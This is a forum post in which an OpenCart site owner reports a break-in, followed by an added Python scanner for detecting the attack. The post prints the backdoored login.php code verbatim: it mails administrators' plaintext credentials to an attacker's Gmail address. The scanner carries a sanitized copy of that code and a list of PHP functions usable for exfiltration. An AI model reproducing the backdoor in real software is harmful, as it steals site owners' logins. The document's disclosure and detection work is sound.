Just discovered some little shitbag got into our site through the /download vulnerability. I'd thought I'd secured that, so I have now deleted that directory, turned off downloads, and reset the main account password (server level).
Digging around, I found that they had set up authorize.net to send credit card details to a yopmail account. Sorted that. Changed all passwords, etc.
By pure luck, after removing the /downloads folder I got an error message in the admin that prompted me to look in the admin/controller/common folder... the little fucker had edited login.php too!! Haven't seen anyone else report this - a pretty simple script edit that emails the login info:
Code:
protected function validate() {
    if (isset($this->request->post['username']) && isset($this->request->post['password']) && !$this->user->login($this->request->post['username'], $this->request->post['password'])) {
        $this->error['warning'] = $this->language->get('error_login');
    }

    if (!$this->error) {
        // Injected: host, request URI and the plaintext username/password, pipe-separated...
        $smail = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . "|" . $this->request->post['username'] . "|" . $this->request->post['password'];
        // ...mailed to the attacker's address every time validate() passes, i.e. on each successful admin login.
        mail("thankforyourhelp2015@gmail.com", "OUR-SITE", $smail, "From: OUR-SITE@fly.com\r\nReply-to: thankforyourhelp2015@gmail.com");
        return true;
    } else {
        return false;
    }
}
I'm traipsing through file edit dates now to see if anything else has been compromised, but it's one to look out for, guys and gals!!
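For anyone who wants to sweep an install for the same trick, here is an added example (my own code, not from the post above and not part of OpenCart): a small scanner that flags PHP lines where a submitted username/password/card field flows into a call that can send data off the server, such as the mail() call in the edited login.php. It tracks taint through plain variable assignments, which is enough for the two-line pattern shown in the post. The two sample sources are constructed for this example: the backdoored one reproduces the posted method inside an assumed class wrapper with the attacker's address swapped for a placeholder, and the "clean" one is simply that method with the two injected lines removed (assumed to resemble the untampered file; check against your own install). Sink and source lists, function names and paths are my choices.

```python
"""Taint scan for credential-exfiltration edits in PHP files (added example)."""
import re
import sys
from pathlib import Path

# Sources: submitted form fields a credential-stealing backdoor would want to capture.
CRED_SOURCE = re.compile(
    r"(?:request->post|\$_POST|\$_REQUEST|\$_GET)\s*\[\s*['\"]"
    r"(?:password|username|email|card\w*|cvv\w*)['\"]\s*\]"
)
# Sinks: PHP calls that can move data off the box (mail() is the one used in the post).
EXFIL_SINK = re.compile(
    r"\b(mail|curl_exec|curl_setopt|file_get_contents|fsockopen|fwrite|"
    r"file_put_contents|error_log)\s*\(",
    re.IGNORECASE,
)
# Plain assignment "$var = ..." or "$var .= ..." (rejects ==, ===, !=).
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*\.?=(?!=)\s*(.+)")


def _uses_tainted(code: str, tainted: set[str]) -> bool:
    """True if any tainted variable name appears in code as a whole token."""
    return any(re.search(re.escape(v) + r"\b", code) for v in tainted)


def scan_php(source: str) -> list[dict]:
    """Return one finding per line where a sink is fed a credential-derived value.

    Taint is tracked per file through simple assignments, so
    "$smail = ... post['password'] ...;" followed by "mail(..., $smail, ...)" is caught.
    """
    tainted: set[str] = set()
    findings: list[dict] = []
    for lineno, line in enumerate(source.splitlines(), 1):
        code = line.strip()
        if code.startswith(("//", "#", "*", "/*")):
            continue  # skip comment lines; a real PHP parser would do better
        m = ASSIGN.match(code)
        if m:
            var, rhs = m.group(1), m.group(2)
            if CRED_SOURCE.search(rhs) or _uses_tainted(rhs, tainted):
                tainted.add(var)
        sink = EXFIL_SINK.search(code)
        if sink and (CRED_SOURCE.search(code) or _uses_tainted(code, tainted)):
            findings.append({"line": lineno, "sink": sink.group(1).lower(), "code": code})
    return findings


def scan_tree(root: Path) -> dict[str, list[dict]]:
    """Scan every .php file under root (e.g. your OpenCart admin/ directory)."""
    results: dict[str, list[dict]] = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_php(path.read_text(errors="replace"))
        if hits:
            results[str(path)] = hits
    return results


# Constructed sample: the backdoored validate() from the post, inside an assumed
# class wrapper, with the attacker's address replaced by a placeholder.
BACKDOORED = """<?php
class ControllerCommonLogin extends Controller {
    protected function validate() {
        if (isset($this->request->post['username']) && isset($this->request->post['password']) && !$this->user->login($this->request->post['username'], $this->request->post['password'])) {
            $this->error['warning'] = $this->language->get('error_login');
        }
        if (!$this->error) {
            $smail = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . "|" . $this->request->post['username'] . "|" . $this->request->post['password'];
            mail("attacker@example.com", "OUR-SITE", $smail, "From: OUR-SITE@example.com");
            return true;
        }
        return false;
    }
}
"""

# Constructed sample: the same method with the two injected lines removed
# (assumed to resemble the untampered file; verify against your own install).
CLEAN = "\n".join(l for l in BACKDOORED.splitlines() if "$smail" not in l) + "\n"

if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    results = scan_tree(root) if root else {"<sample>": scan_php(BACKDOORED)}
    for path, hits in results.items():
        for h in hits:
            print(f"{path}:{h['line']}: {h['sink']}() fed with credentials: {h['code']}")
```

Run it as `python scan.py /path/to/admin` and review every hit by hand: a legitimate contact form that does `mail(..., $_POST['email'], ...)` will show up too, so this is a triage aid, not a verdict. It complements the edit-date sweep rather than replacing it, since an attacker who can edit login.php can also reset mtimes; comparing the file contents against a clean copy of the same OpenCart release is the more reliable check.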